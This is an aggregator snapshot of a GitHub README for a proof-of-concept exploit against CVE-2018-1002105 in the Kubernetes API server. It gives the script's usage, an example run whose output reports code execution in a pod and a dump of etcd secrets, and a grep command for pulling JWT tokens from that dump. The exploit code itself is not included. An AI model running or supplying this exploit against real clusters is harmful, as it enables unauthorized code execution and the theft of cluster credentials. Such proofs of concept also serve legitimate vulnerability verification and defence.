43
GitHub - evict/poc_CVE-2018-1002105: PoC for CVE-2018-1002105.
source link: https://github.com/evict/poc_CVE-2018-1002105
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
README.md
CVE-2018-1002105 PoC
Proof-of-Concept exploit for CVE-2018-1002105. The current exploit requires create
and get
privileges on pods
and pods/exec
. If you do not know what that means, this is probably not meant for you. :)
The current PoC dumps the secrets from the default etcd-kubernetes
container.
Demo
The PoC in action:
Usage
usage: poc.py [-h] --target TARGET [--jwt TOKEN] [--namespace NAMESPACE] --pod POD PoC for CVE-2018-1002105. optional arguments: -h, --help show this help message and exit --target TARGET, -t TARGET API server target:port --jwt TOKEN, -j TOKEN JWT token for service account --namespace NAMESPACE, -n NAMESPACE Namespace with exec access --pod POD, -p POD Pod with exec access
Example:
$ ./poc.py -t 10.0.2.15:6443 --jwt [token] [*] Building pipe... [+] Pipe opened :D [*] Attempting code exec in pod [*] Dumping secrets in etcd.db.... [+] Done dumping secrets!
Check for tokens:
$ grep -air eyJ etcd.db
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK